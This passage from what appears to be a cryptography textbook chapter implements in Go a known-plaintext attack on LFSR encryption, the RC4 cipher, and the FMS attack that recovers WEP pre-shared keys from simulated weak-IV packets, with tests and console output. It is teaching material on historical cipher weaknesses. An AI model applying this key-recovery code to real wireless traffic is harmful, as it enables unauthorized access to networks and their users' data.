Listing 4.5 ch04/lfsr/exploit_lfsr/exploit_lfsr.go

58 func RecoverLFSRFromObservedBits(observedBits []byte) (*impl_lfsr.LFSR, error) {
59     for i := 1; i < MaxLfsrLength; i++ {
60         if clonedLfsr, err := RecoverLFSRWithKnownLengthFromObservedBits(observedBits, i); err == nil {
61             return clonedLfsr, nil
62         }
63     }
64     return nil, errors.New("could not recover LFSR")
65 }

To test our exploit we simulate a scenario where an attacker knows a prefix but not the
entire plaintext. That is, the attacker knows that the plaintext message starts with ATTACK
AT but does not know what comes after it. The attacker intercepts a ciphertext and knows
that it was encrypted using an LFSR. Listing 4.6 shows the function that will be used to
simulate this scenario and generate an attack message.

Listing 4.6 ch04/lfsr/exploit_lfsr/exploit_lfsr_test.go

87 const AttackMessageKnownPrefix = "ATTACK AT "
88
89 func GenerateEncryptedAttackMessage() []byte {
90     rand.Seed(time.Now().Unix())
91     minTime := time.Date(2022, 1, 0, 0, 0, 0, 0, time.UTC).Unix()
92     maxTime := time.Date(2025, 1, 0, 0, 0, 0, 0, time.UTC).Unix()
93     deltaTime := maxTime - minTime
94     seconds := rand.Int63n(deltaTime) + minTime
95     plaintext := AttackMessageKnownPrefix + time.Unix(seconds, 0).String()
96
97     seed := uint16(rand.Intn(256))
98     lfsr := impl_lfsr.NewLFSR16Bit(seed)
99     return lfsr.Encrypt([]byte(plaintext))
100 }

Listing 4.7 generates an encrypted attack message and then recovers the LFSR used
to encrypt it by using the known plaintext. Line 107 corresponds to equation 4.2, re-
versing the keystream by XORing the known plaintext bytes with the corresponding cipher-
text bytes. Lines 108 - 110 “expand” each keystream byte into individual bits to be pro-
cessed by the functions we have defined so far. Line 112 clones the LFSR using the observed
keystream bits (so that we can decrypt the remaining ciphertext, where we do not know
the corresponding plaintext). Line 117 “decrypts” the ciphertext by encrypting it with the
recovered LFSR. We saw previously that for XOR, encryption and decryption are the
same operation, so if we have reversed the LFSR correctly we should get back the original
plaintext. Running the LFSR tests by executing make lfsr generates the output shown in
listing 4.8.

Listing 4.7 ch04/lfsr/exploit_lfsr/exploit_lfsr_test.go

102 func TestKnownPlaintextAttack(t *testing.T) {
103     ciphertext := GenerateEncryptedAttackMessage()
104     t.Logf("Ciphertext: %q", ciphertext)
105     keystreamBits := make([]byte, 8*len(AttackMessageKnownPrefix))
106     for i := 0; i < len(AttackMessageKnownPrefix); i++ {
107         keystreamByte := ciphertext[i] ^ AttackMessageKnownPrefix[i]
108         for j := 0; j < 8; j++ {
109             keystreamBits[8*i+j] = (keystreamByte >> (7 - j)) & 1 // Expand keystream bytes to bits
110         }
111     }
112     recoveredLfsr, err := RecoverLFSRFromObservedBits(keystreamBits)
113     if err != nil {
114         t.Error(err)
115     }
116     remainingCiphertext := ciphertext[len(AttackMessageKnownPrefix):]
117     decrypted := recoveredLfsr.Encrypt(remainingCiphertext)
118     t.Logf("Decrypted message: %s%s\n", AttackMessageKnownPrefix, decrypted)
119 }

Listing 4.8 make lfsr

...
=== RUN TestKnownPlaintextAttack
exploit_lfsr_test.go:104: Ciphertext: ”e\xc67gWL.\x7f\xdd08\x8d0J\xaaFQL
:\x90(\xfd\xf6\xcb\x10\x1b/E\xfd\x1f:\xa4\x06\x1a\xae\x83x\x9c2”
exploit_lfsr_test.go:118: Decrypted message: ATTACK AT 2024-01-10
11:25:35 -0800 PST
--- PASS: TestKnownPlaintextAttack (0.00s)
...

4.3 RC4 Encryption & Wi-Fi Security


We saw how stream ciphers approximate the one-time pad by XORing plaintext with a
keystream to generate the ciphertext. We will now take a look at a famous stream cipher
known as RC4 (Rivest Cipher 4 – named after its creator Ron Rivest). RC4 is quite simple
to describe and easy to implement in both software and hardware, but its use has led to
several vulnerabilities – most notably the fall of the industry’s first attempt at Wi-Fi
security: WEP (Wired Equivalent Privacy). We will look at the WEP vulnerability in
detail and simulate an exploit in Go.

4.3.1 Implementing RC4

Figure 4.8 RC4 internal state: a 256 byte S-box and two pointers i & j

Like other stream ciphers, RC4 generates a keystream as output. Unlike LFSRs though,
RC4 generates the keystream one byte at a time (as opposed to the individual bits generated by
each LFSR cycle). These bytes are subsequently used as the keystream for XORing with the
plaintext. RC4’s internal state consists of the two parts shown in figure 4.8:

- An “S-box” (substitution box) containing 256 bytes. The S-box starts out with each
location holding its own index (i.e., index 6 would contain the byte 0x06 and so on) and
the algorithm steps then shuffle the contents around. This makes the S-box a
permutation: each number from 0-255 appears in the S-box exactly once at all times,
but the locations keep changing. Think of filling a box with a bunch of rocks and
shaking it violently. The rocks would definitely be displaced – their “ordering” would
change – but the box would still contain the same rocks as before.
- Two pointers i and j that keep jumping around the S-box indices based on the algo-
rithm steps.
Our definition of the RC4 internal state is shown in listing 4.9. We also define a swap
helper function on line 13 that we will shortly use in the KSA and PRGA methods.
Listing 4.9 ch04/rc4/impl_rc4/impl_rc4.go

 1 package impl_rc4
 2
 3 import (
 4     "math/rand"
 5     "time"
 6 )
 7
 8 type RC4 struct {
 9     key   []byte
10     state [256]byte
11 }
12
13 func swap(x, y *byte) {
14     tmp := *x
15     *x = *y
16     *y = tmp
17 }
18
19 func NewRC4(key []byte) *RC4 {
20     rc4 := &RC4{
21         key: make([]byte, len(key)),
22     }
23     copy(rc4.key, key)
24     return rc4
25 }

RC4 consists of two phases: (1) the key-scheduling algorithm (KSA) and (2) the pseudo-
random generation algorithm (PRGA). When RC4 is initialized with a new key, KSA runs
once and then PRGA generates the bytes to be used as the keystream.
The pseudocode for KSA is shown in listing 4.10 [1]. The S array denotes the S-box
and K is the initial key. The first loop initializes the S-box with all values from 0 to 255
(inclusive). The second loop shuffles those bytes around using the i and j pointers.
The i pointer scans the S-box all the way from starting index 0 to last index 255 in an
incremental fashion. The j pointer, however, keeps jumping all over the place. Each new
value of j is obtained by adding the previous value of j, S[i] and K[i] (since i can exceed
the length of the key, the key lookup wraps around as K[i % len(K)]). At each step S[i] and S[j]
are swapped in the S-box.

Listing 4.10 Pseudocode for RC4 key-scheduling algorithm

for i from 0 to 255
    S[i] := i
endfor
j := 0
for i from 0 to 255
    j := (j + S[i] + key[i mod keylength]) mod 256
    swap values of S[i] and S[j]
endfor

Listing 4.11 implements the pseudocode from listing 4.10 in Go. The first iteration of
KSA with a key of "HELLO" is shown in figure 4.9.
Listing 4.11 ch04/rc4/impl_rc4/impl_rc4.go

27 func (rc4 *RC4) ksa() {
28     for i := 0; i < 256; i++ {
29         rc4.state[i] = byte(i)
30     }
31     j := 0
32     for i := 0; i < 256; i++ {
33         j = (j + int(rc4.state[i]) + int(rc4.key[i%len(rc4.key)])) % 256
34         swap(&rc4.state[i], &rc4.state[j])
35     }
36 }

Figure 4.9 First iteration of KSA for RC4 with a key of “HELLO”, this step happens 255 more times.

The pseudocode for PRGA is shown in listing 4.12 [1]. Every time we need a new
byte for the keystream we increment i by one (wrapping around 256 if needed), and then
add S[i] to j. We then swap S[i] and S[j] and use S[i]+S[j] as an index once more
into the S-box to fetch the final output, the keystream byte KS. Listing 4.13 shows the
same pseudocode translated to Go. Figure 4.10 shows PRGA generating a single byte of
keystream by showing line 46 in action.

Listing 4.12 Pseudocode for RC4 pseudo-random generation algorithm

i := 0
j := 0
while GeneratingOutput:
    i := (i + 1) mod 256
    j := (j + S[i]) mod 256
    swap values of S[i] and S[j]
    KS := S[(S[i] + S[j]) mod 256]
    output KS
endwhile

Listing 4.13 ch04/rc4/impl_rc4/impl_rc4.go

38 func (rc4 *RC4) prga(length int) []byte {
39     i := 0
40     j := 0
41     keyStream := make([]byte, length)
42     for k := 0; k < length; k++ {
43         i = (i + 1) % 256
44         j = (j + int(rc4.state[i])) % 256
45         swap(&rc4.state[i], &rc4.state[j])
46         t := (int(rc4.state[i]) + int(rc4.state[j])) % 256
47         keyStream[k] = rc4.state[t]
48     }
49     return keyStream
50 }

Figure 4.10 One iteration of PRGA producing a keystream byte (after i & j are already swapped)

4.3.2 Exploiting RC4 in WEP using the Fluhrer, Mantin and Shamir (FMS) attack
WEP (Wired Equivalent Privacy) is an algorithm for Wi-Fi security that was ratified as
a standard in the late 90s. If you had the experience of setting a Wi-Fi password on
routers supporting WEP in the early 00s, you might remember that it had to be of a
fixed length (among a few choices – 5, 13, 16 or 29 characters long). I remember being fond
of helloworld123 as the Wi-Fi password for a while because it was exactly 13 characters
long while being very easy to communicate and remember.
Figure 4.11 shows the commonly used setup for WEP. An administrator performed the
initial setup on the Wi-Fi device by entering a pre-shared key and then shared that with
the user. The pre-shared key was colloquially known as the “Wi-Fi password” (and every
so often the admin and the user happened to be the same unfortunate soul). Each packet
was encrypted using RC4 with a new key. Each RC4 key would be obtained by concatenat-
ing three random bytes – known as “initialization vector” or IV – with the pre-shared key.
The IV would be sent publicly along with the encrypted packet. The recipient would con-
catenate the packet’s IV again with the PSK to decrypt the packet correctly. If an attacker
snooped the wireless traffic they would know the IV but not the PSK hence they would (in
theory) not know the individual RC4 keys for each packet and the communication would
stay protected. Essentially, the IV is the cryptographic nonce we discussed briefly while
introducing stream ciphers.

Figure 4.11 WEP setup showing pre-shared keys and initialization vectors as input to RC4

As soon as WEP was standardized in the late 90s, concerns were raised about the nonce
being too small. The IV consisted of only three bytes or 24 bits – providing 2^24 possi-
ble values. Even if the Wi-Fi drivers (which provided the initialization vector) were using
good-quality RNGs, it would on average take 2^12 (roughly four thousand) packets before
two messages ended up using the same IV, allowing an attacker to recover their XORed
contents.
In the early 2000s a new attack on RC4 – known as the FMS attack (after the sur-
names of its discoverers) – came to light that completely shattered any illusions of security
provided by WEP. Even with the discovery of this new attack, not all RC4 implementations
were broken. For example, at the time TLS (Transport Layer Security, used to pro-
vide website security) remained unscathed because it was using a unique 128-bit key for
each message. Compared to WEP – where an attacker needed to capture four thousand pack-
ets before seeing a collision – an attack on TLS needed drastically more (2^64, or some
18 quintillion) messages before a collision would take place on the same web connection.
TLS’ usage of RC4 was later broken by other weaknesses in the cipher that would be too
discursive to discuss in this chapter. We will however implement the FMS attack in Go
and simulate WEP traffic to test our exploit.
GENERATING WEP PACKETS WITH WEAK IVS
At its core, the FMS attack hinges on the choice of initialization vectors used by Wi-Fi
devices. Not all WEP IVs are equally vulnerable to this attack; instead, it only works
when someone ends up choosing an IV of the form shown in equation 4.8.

IV = (L, 255, X) (4.8)


Where L is the index of the byte we are trying to recover in the RC4 key and X can
be any random one-byte value (i.e., between 0-255). These weak IVs end up leaking
information about the fixed PSK (pre-shared key). The attacker can see the IVs being sent
in the clear (as shown in figure 4.11), and every time a weak IV is used it increases their
chances of recovering bytes of the original RC4 key.
To simulate this attack we are going to add a WEP packet generator to our RC4 im-
plementation as shown in listing 4.14. The plaintext for the first 8 bytes is known for all
WEP packets as those bytes are fixed by the link-layer (networking) protocol [2]. This allows
the attacker to recover the first 8 bytes of the keystream, but if WEP’s RC4 usage
were not broken, that would not give the attacker any information about the
original pre-shared key that was (along with the IV) used to initialize RC4. The known
bytes are defined on line 63. Consumers of this struct generate WEP packets by calling
GeneratePacketUsingWeakIV(targetIndex), which returns the IV used for encrypting
the packet (as it is public) as well as the encrypted packet itself. Line 78 shows the
generation of a weak IV.

Listing 4.14 ch04/rc4/impl_rc4/impl_rc4.go

63 var SNAPHeader = [8]byte{0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x06}
64
65 type WEPPacketGenerator struct {
66     psk []byte
67 }
68
69 func NewWEPPacketGenerator(psk []byte) *WEPPacketGenerator {
70     generator := &WEPPacketGenerator{
71         psk: make([]byte, len(psk)),
72     }
73     copy(generator.psk, psk)
74     return generator
75 }
76
77 func (wpg *WEPPacketGenerator) GeneratePacketUsingWeakIV(targetIndex int) ([3]byte, []byte) {
78     iv := [3]byte{byte(targetIndex), 255, byte(rand.Intn(256))} // Weak IV (equation 4.8)
79     key := make([]byte, len(iv)+len(wpg.psk))
80     copy(key[0:len(iv)], iv[:])
81     copy(key[len(iv):], wpg.psk)
82     rc4 := NewRC4(key)
83     return iv, rc4.Encrypt(SNAPHeader[:])
84 }

To understand the FMS exploit we will look at the RC4 key and S-box in detail for each
of the first few steps of the key-scheduling algorithm. As the attacker we know the
first 3 bytes of the RC4 key (the IV), so the first time we call GeneratePacketUsingWeakIV
(targetIndex) we set targetIndex to 3. For a PSK of length N, after the concatenation of
the IV and PSK the RC4 key looks like figure 4.12. The S-box at the very beginning
of KSA looks like figure 4.13, corresponding to the values of i and j in equation 4.9.
Figure 4.12 RC4 key for GeneratePacketUsingWeakIV(targetIndex=3)

Figure 4.13 KSA S-box and key for RC4 in WEP (S0 , the initial state)

i0 = 0
j0 = 0        (4.9)

For your convenience we are listing the pseudocode for KSA again in listing 4.15. Fol-
lowing the pseudocode, the first update to i and j is shown in equation 4.10. At the end of
each iteration of the KSA, S[j_new] is swapped with S[i_old]. For example, at the end of the
first iteration S[i0] is swapped with S[j1], giving us S1 as depicted in figure 4.14. The values
at indices 0 and 3 (the shaded boxes) have just been swapped.

Listing 4.15 Pseudocode for RC4 key-scheduling algorithm

for i from 0 to 255
    S[i] := i
endfor
j := 0
for i from 0 to 255
    j := (j + S[i] + key[i mod keylength]) mod 256
    swap values of S[i] and S[j]
endfor
i0 = 0
j1 = j0 + S0[i0] + K[i0]
   = 0 + S0[0] + K[0]
   = 0 + 0 + 3
   = 3                          (4.10)
i1 = 1

Figure 4.14 KSA for RC4 in WEP (S1 )

Let’s execute one more iteration of KSA, giving us equation 4.11 and figure 4.15.

i2 = 2
j2 = j1 + S1[i1] + K[i1]
   = 3 + S1[1] + K[1]
   = 3 + 1 + 255
   = 259
   ≡ 3 (mod 256)                (4.11)

The first two bytes of the IV (3 and 255) have played their role in scrambling the S-box.
We chose a random value for the third byte and called it X. The reason we did not actually
give X a value is that it does not really matter (for the discussion of this attack). Let’s
keep it as X and get the new values of our counters in equation 4.12.
Figure 4.15 KSA for RC4 in WEP (S2 )

i3 = 3
j3 = j2 + S2[i2] + K[i2]
   = 3 + S2[2] + K[2]
   = 3 + 2 + X
   = X′                          (4.12)

The reason we don’t care about X and X′ is that X is already known as the third
byte of the IV (i.e., as K[2]) for each packet. We do not need to crack X; it will always
be sent in public by the Wi-Fi devices. We are interested in the first byte of the PSK, i.e.,
PSK1 or K[3], which we will obtain by the end of this procedure. For now, let’s swap the
values at indices 2 (i.e., i2) and X′ (i.e., j3) in our S-box, as shown in figure 4.16.

i4 = 4
j4 = j3 + S3[i3] + K[i3]
   = j3 + S3[3] + K[3]           (4.13)

Let’s take a look at the next update of our counters in equation 4.13, which gives us S4 as
shown in figure 4.17. We are getting closer to what we want, i.e., K[3]. We can rear-
range our variables to get the holy grail (K[3]) in equation 4.14.

K[3] = j4 − j3 − S3[i3]
     = j4 − X′ − S3[3]           (4.14)

RECOVERING THE FIRST BYTE OF THE PSK


Figure 4.16 KSA for RC4 in WEP (S3 )

Figure 4.17 KSA for RC4 in WEP (S4 )

Now we face a challenge in continuing our KSA execution with the next byte of the key:
as attackers we have now exhausted the three public bytes of the IV, ending up with the
same S4 as the genuine recipient so far (shown in figure 4.17). We also know X′ because
it depended only on X, the public third byte of the IV. However, we still do not know j4. In
other words, since the IV is public, as attackers we can only perform the first three iterations of
KSA (for certain weak IVs); continuing beyond that would require knowledge of the
PSK.

Listing 4.16 Pseudocode for RC4 pseudo-random generation algorithm

i := 0
j := 0
while GeneratingOutput:
i := (i + 1) mod 256
j := (j + S[i]) mod 256
swap values of S[i] and S[j]
KS := S[(S[i] + S[j]) mod 256]
output KS
endwhile
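The pseudocode above translates almost line for line into Go. The sketch below is ours (independent of the impl_rc4 package): it takes an already-initialized S-box and emits n keystream bytes. Because Go arrays are passed by value, the caller's S-box is left untouched.

```go
package main

import "fmt"

// prga mirrors listing 4.16: given an initialized S-box, it produces
// n bytes of RC4 keystream by walking i forward, hopping j, swapping,
// and emitting S[(S[i] + S[j]) mod 256] each round.
func prga(s [256]byte, n int) []byte {
	i, j := 0, 0
	out := make([]byte, 0, n)
	for len(out) < n {
		i = (i + 1) % 256
		j = (j + int(s[i])) % 256
		s[i], s[j] = s[j], s[i] // the array was copied in, so this swap is local
		out = append(out, s[(int(s[i])+int(s[j]))%256])
	}
	return out
}

func main() {
	// Identity S-box (no key mixing) just to show deterministic output;
	// real RC4 would first run the KSA with a key to scramble S.
	var s [256]byte
	for i := range s {
		s[i] = byte(i)
	}
	fmt.Println(prga(s, 4)) // prints "[2 5 7 13]"
}
```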

Now imagine that the values at the three locations pointed to by arrows in figure 4.17 (in-
dices 0, 1, and 3) do not change for the rest of the KSA. That is, when we get to the
PRGA (shown again in listing 4.16 for convenience), we have (S0[0], S0[1], S0[3]) =
(3, 0, j4(KSA)); i.e., they have remained unchanged from S4 of the KSA all the way up to S255,
which becomes S0 for the PRGA. This is not as far-fetched as it sounds: the i pointer
traverses the S-box steadily from left to right while the j pointer keeps hopping all over
the place. Since i has already traversed indices 0, 1, and 3 by S4, our assumption relies only
on j not landing on one of these crucial indices again for the rest of the KSA. If this condition
holds, the initial S-box for the PRGA is as shown in figure 4.18. The first update of our
counters is shown in equation 4.15.

Figure 4.18 PRGA S-box for RC4 in WEP (S0 )

i0 = 0; j0 = 0
i1 = 1; j1 = j0 + S0[1]   (4.15)
        = 0 + 0
        = 0

After the swap we get S1 as shown in figure 4.19. The first byte of the keystream (output
of the PRGA) is given by equation 4.16. If our grand assumption holds that the important
bytes did not change positions between S4 and S255 of KSA (and hence S0 of PRGA),
the first byte of the keystream will be j4(KSA) , exactly what we needed to solve for K [3]
in equation 4.14. Equation 4.17 shows the final calculation we will do to resolve K [3].
Remember, we could run KSA only up to j3 and could not find out j4 . However, because
of our assumption of crucial bytes not shifting for the rest of KSA we found out j4 as the
first output of the PRGA.
Figure 4.19 PRGA S-box for RC4 in WEP (S1 )

KS0 = S1[S1[i1] + S1[j1]]
    = S1[S1[1] + S1[0]]   (4.16)
    = S1[3]
    = j4(KSA)

How often would our assumption (that the crucial positions are not touched between
S4(KSA) → S255(KSA) → S0(PRGA)) hold? If RC4 in WEP were not vulnerable to the FMS
attack, the answer would be 1/256; i.e., any of the bytes of S4(KSA) would have an
equal probability of about 0.4% of being the first output of the PRGA. As it turns out, RC4
has statistical biases, and our assumption holds about 3-5% of the time (much more often
than 0.4%). The practical implication of this bias is that since we know the first 8 bytes of
plaintext, we can always find out KS[0]; and j4(KSA) will simply be the most frequent value
that appears as KS[0]. To recap: without these biases KS[0] would give us no information
about the original key, but because of them KS[0] tends to be j4(KSA) more frequently
than chance. This allows the attacker to recover K[3] using equation 4.17. The attack works
for any index other than 3 as well (provided we have recovered the key bytes before that
index), as shown by equation 4.18.

K[3] = j4(KSA) − j3(KSA) − S3(KSA)[3]   (4.17)
     = KS[0] − j3(KSA) − S3(KSA)[3]

K [L] = KS [0] − jL(KSA) − SL(KSA) [L] (4.18)
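Equation 4.18 is a single modular subtraction, but there is a Go-specific wrinkle worth noting before we implement the full attack: Go's % operator can return a negative result when the dividend is negative, so the value must be normalized into the 0-255 range. A minimal sketch (the function name is ours):

```go
package main

import "fmt"

// candidateKeyByte applies equation 4.18: K[L] = KS[0] - jL - SL[L] (mod 256).
// Go's % operator preserves the sign of the dividend, so we add 256
// before the final reduction to keep the result in [0, 255].
func candidateKeyByte(ks0 byte, jL int, sLL byte) byte {
	return byte(((int(ks0)-jL-int(sLL))%256 + 256) % 256)
}

func main() {
	// 0x10 - 200 - 0x30 = -232, which must wrap around to 24 (mod 256).
	fmt.Println(candidateKeyByte(0x10, 200, 0x30)) // prints "24"
}
```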

We can now implement our attack in Go and use the WEP Packet Generator implemented
earlier in this chapter (which encrypts the first 8 bytes of WEP packets – the fixed SNAP header – with a user-
provided PSK and a weak IV) to test our attack. Listing 4.17 shows the FMS algorithm
recovering the PSK for RC4 in WEP; the attack sequence is described below:
RecoverWEPPSK(wpg, partialKey) is called with a WEP Packet Generator initial-
ized with a specific PSK. Note that RecoverWEPPSK cannot see the PSK; it can
only ask for more packets to be generated using weak IVs. This simulates an at-
tacker sniffing Wi-Fi packets and encountering weak IVs. The amount of traffic we
simulate is capped by the WEPMessageVolume constant, set to 50k for our current test.
partialKey denotes the partially recovered PSK: for the first invocation of the method
it will be an empty slice, for the second it will contain one byte, and so on.
The first thing we do inside the function body is identify the index we want to target
with our FMS attack. Since the first three bytes of the RC4 key are known (as the IV),
the targetIndex value is equal to the length of the PSK we have recovered
so far plus three. At the beginning, we do not know any bytes of the PSK, so
targetIndex is 3. This is shown in line 18. The targetIndex variable corresponds
to L in equation 4.18.
Lines 23 - 24 depict a known-plaintext attack, where knowledge of the first byte of
the plaintext gives us the first byte of the keystream. For the FMS attack, the
first keystream byte is all we need (we don’t need the next 7 keystream bytes,
even though they could also be found by XORing ciphertext with the SNAP header).
Lines 26 - 28 copy the IV and partial PSK respectively to create the RC4 key.
Lines 30 - 38 depict partial execution of the KSA up to iteration L.
Lines 40 - 45 show us finding a candidate for K[L] using equation 4.18. We will get
multiple values for K[L], but the correct value will appear 3-5% of the time (instead
of only 0.4% of the time, which would have prevented us from selecting one value
as the “winner”).
The remaining lines of the function simply select the byte value that appeared most
often as K[L]. We pretty-print some stats and then end the function by returning the
candidate byte that appeared with the highest frequency.

Listing 4.17 ch04/rc4/exploit_rc4/exploit_rc4.go

 1 package exploit_rc4
 2
 3 import (
 4     "fmt"
 5
 6     "github.com/krkhan/crypto-impl-exploit/ch04/rc4/impl_rc4"
 7 )
 8
 9 const WEPMessageVolume = 50000
10
11 func swap(x, y *byte) {
12     tmp := *x
13     *x = *y
14     *y = tmp
15 }
16
17 func RecoverWEPPSK(wpg *impl_rc4.WEPPacketGenerator, partialKey []byte) byte {
18     targetIndex := 3 + len(partialKey) // RC4 key = 3 bytes of IV + PSK
19     totalCount := 0
20     freqDict := [256]int{}
21
22     for i := 0; i < WEPMessageVolume; i++ {
23         iv, ciphertext := wpg.GeneratePacketUsingWeakIV(targetIndex)
24         keystreamByte := impl_rc4.SNAPHeader[0] ^ ciphertext[0] // recover the first keystream byte using known plaintext
25
26         key := make([]byte, len(iv)+len(partialKey)) // concatenate IV and PSK to create the RC4 key
27         copy(key[0:len(iv)], iv[:])
28         copy(key[len(iv):], partialKey)
29
30         state := [256]byte{}
31         for i := 0; i < 256; i++ {
32             state[i] = byte(i)
33         }
34         j := 0
35         for i := 0; i < targetIndex; i++ { // partial execution of KSA for targetIndex iterations
36             j = (j + int(state[i]) + int(key[i])) % 256
37             swap(&state[i], &state[j])
38         }
39
40         candidateKey := (int(keystreamByte) - j - int(state[targetIndex])) % 256 // calculate K[L] from equation 4.18
41         if candidateKey < 0 {
42             candidateKey += 256
43         }
44         freqDict[candidateKey] += 1 // track the count for each candidate
45         totalCount += 1
46     }
47
48     var highestFreqCandidate byte
49     var highestFreqPercentage float64
50     for i := 0; i < 256; i++ {
51         freqPercentage := float64(freqDict[i]) / float64(totalCount) * 100
52         if freqPercentage > highestFreqPercentage {
53             highestFreqCandidate = byte(i)
54             highestFreqPercentage = freqPercentage
55         }
56     }
57
58     fmt.Printf("recovered byte: 0x%02x, frequency: %.2f%%\n", highestFreqCandidate, highestFreqPercentage)
59     return highestFreqCandidate
60 }

We test our exploit by creating a WEPPacketGenerator initialized with a specific PSK.


We then call RecoverWEPPSK(wpg, partialKey) as many times as needed, with wpg pointing
to the packet generator and partialKey denoting the key we have recovered so far. This
is shown in listing 4.18, where we test our exploit twice using the pre-shared keys
“helloworld123” and “1supersecret1”.

Listing 4.18 ch04/rc4/exploit_rc4/exploit_rc4_test.go


 1 package exploit_rc4
 2
 3 import (
 4     "testing"
 5
 6     "github.com/krkhan/crypto-impl-exploit/ch04/rc4/impl_rc4"
 7 )
 8
 9 func TestRecoverWEPPSK(t *testing.T) {
10     t.Logf("message volume: %d", WEPMessageVolume)
11
12     originalKey := []byte("helloworld123")
13     wpg := impl_rc4.NewWEPPacketGenerator(originalKey)
14     recoveredKey := []byte{}
15
16     for i := 0; i < len(originalKey); i++ {
17         recoveredKeyByte := RecoverWEPPSK(wpg, recoveredKey)
18         recoveredKey = append(recoveredKey, recoveredKeyByte)
19     }
20     t.Logf("recovered key: %q", recoveredKey)
21
22     for i := 0; i < len(originalKey); i++ {
23         if recoveredKey[i] != originalKey[i] {
24             t.Fatalf("key mismatch, recovered: %v, original: %v\n", recoveredKey, originalKey)
25         }
26     }
27
28     originalKey = []byte("1supersecret1")
29     wpg = impl_rc4.NewWEPPacketGenerator(originalKey)
30     recoveredKey = []byte{}
31
32     for i := 0; i < len(originalKey); i++ {
33         recoveredKeyByte := RecoverWEPPSK(wpg, recoveredKey)
34         recoveredKey = append(recoveredKey, recoveredKeyByte)
35     }
36     t.Logf("recovered key: %q", recoveredKey)
37
38     for i := 0; i < len(originalKey); i++ {
39         if recoveredKey[i] != originalKey[i] {
40             t.Fatalf("key mismatch, recovered: %v, original: %v\n", recoveredKey, originalKey)
41         }
42     }
43 }

The output of our test is shown in listing 4.19. As you can see, the correct K[L] values
(which appeared as the most frequent candidates) also fall roughly in the 3-5% range. Con-
gratulations: we have implemented the FMS attack and successfully recovered a WEP
PSK!

Listing 4.19 Console output for testing TestRecoverWEPPSK

$ make exploit_rc4

go clean -testcache
go test -v ./ch04/rc4/exploit_rc4
=== RUN TestRecoverWEPPSK
exploit_rc4_test.go:10: message volume: 50000
recovered byte: 0x68, frequency: 4.32%
recovered byte: 0x65, frequency: 5.28%
recovered byte: 0x6c, frequency: 4.75%
recovered byte: 0x6c, frequency: 2.76%
recovered byte: 0x6f, frequency: 3.40%
recovered byte: 0x77, frequency: 4.37%
recovered byte: 0x6f, frequency: 4.69%
recovered byte: 0x72, frequency: 5.86%
recovered byte: 0x6c, frequency: 3.25%
recovered byte: 0x64, frequency: 3.49%
recovered byte: 0x31, frequency: 5.31%
recovered byte: 0x32, frequency: 5.56%
recovered byte: 0x33, frequency: 4.61%
exploit_rc4_test.go:18: recovered key: ”helloworld123”
recovered byte: 0x31, frequency: 5.31%
recovered byte: 0x73, frequency: 5.85%
recovered byte: 0x75, frequency: 4.66%
recovered byte: 0x70, frequency: 5.36%
recovered byte: 0x65, frequency: 4.31%
recovered byte: 0x72, frequency: 6.94%
recovered byte: 0x73, frequency: 5.47%
recovered byte: 0x65, frequency: 4.84%
recovered byte: 0x63, frequency: 5.97%
recovered byte: 0x72, frequency: 4.84%
recovered byte: 0x65, frequency: 6.28%
recovered byte: 0x74, frequency: 3.84%
recovered byte: 0x31, frequency: 5.10%
exploit_rc4_test.go:34: recovered key: ”1supersecret1”
--- PASS: TestRecoverWEPPSK (4.03s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch04/rc4/exploit_rc4 4.031s

We have also just implemented our first probabilistic/statistical attack, one where the re-
sults are not guaranteed; such attacks are encountered quite often in cryptography. The reader
is encouraged to change WEPMessageVolume in listing 4.17 to different values to see how that
impacts the results. With 50k messages (using weak IVs) we were able to recover the two
PSKs we tested. If we set the message volume to 500 we get incorrect results, as shown in
listing 4.20. The low volume corresponds to low-traffic Wi-Fi connections: it was easier to break
WEP in public places like cafés, where there was a high volume of traffic (and hence more
messages with weak IVs), than in residential areas, where it would take longer for weak IVs to
appear. In other words, the more Wi-Fi traffic with weak IVs an attacker was able to capture,
the more confidence they could gain in the results of their FMS attack.

Listing 4.20 Low message volume leads to incorrect results for the FMS attack

$ make exploit_rc4
go clean -testcache
go test -v ./ch04/rc4/exploit_rc4
=== RUN TestRecoverWEPPSK
exploit_rc4_test.go:10: message volume: 500
recovered byte: 0x68, frequency: 3.80%
recovered byte: 0x65, frequency: 5.40%
recovered byte: 0x6c, frequency: 3.40%
recovered byte: 0x6c, frequency: 3.60%
recovered byte: 0x94, frequency: 2.00%
recovered byte: 0x2c, frequency: 2.60%
recovered byte: 0x95, frequency: 3.80%
recovered byte: 0x72, frequency: 4.40%
recovered byte: 0x6c, frequency: 3.20%
recovered byte: 0x64, frequency: 2.40%
recovered byte: 0x31, frequency: 6.40%
recovered byte: 0x32, frequency: 4.00%
recovered byte: 0x33, frequency: 5.80%
exploit_rc4_test.go:20: recovered key: ”hell\x94,\x95rld123”
exploit_rc4_test.go:24: key mismatch, recovered: [104 101 108 108 148 44 149 114 108 100 49 50 51],
original: [104 101 108 108 111 119 111 114 108 100 49 50 51]
--- FAIL: TestRecoverWEPPSK (0.04s)
FAIL
FAIL github.com/krkhan/crypto-impl-exploit/ch04/rc4/exploit_rc4 0.038s
FAIL
make: *** [Makefile:54: exploit_rc4] Error 1

4.4 Summary
XOR is a Boolean operation that takes two inputs and outputs true if and only if exactly
one of them is true. In other words, XOR is true when one of its inputs is exclusively true.
XOR serves as the building block of many encryption algorithms because:

– When using the same key, encryption and decryption are reverse operations of
each other, so ciphertext can be reversed back to plaintext using the original
key.

– For a bit encrypted with XOR, without knowledge of the key, all plaintexts (both
true and false) have equal probability of being the original message.

XOR encryption runs the risk of known-plaintext attacks, where an attacker can XOR
a ciphertext with its known plaintext to recover the key.
An attacker can also XOR two ciphertexts to reveal the XOR of their corresponding plain-
texts.
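Both of these pitfalls can be demonstrated in a few lines of Go (toy data and a repeating single-byte key, purely for illustration):

```go
package main

import "fmt"

// xorBytes XORs two equal-length byte slices element by element.
func xorBytes(a, b []byte) []byte {
	out := make([]byte, len(a))
	for i := range a {
		out[i] = a[i] ^ b[i]
	}
	return out
}

func main() {
	key := []byte{0x42, 0x42, 0x42, 0x42, 0x42}
	pt1 := []byte("HELLO")
	pt2 := []byte("WORLD")
	ct1 := xorBytes(pt1, key)
	ct2 := xorBytes(pt2, key)

	// Known-plaintext attack: ciphertext XOR plaintext reveals the key.
	fmt.Printf("%x\n", xorBytes(ct1, pt1))
	// Key reuse: ct1 XOR ct2 equals pt1 XOR pt2, leaking plaintext structure
	// without the attacker ever touching the key.
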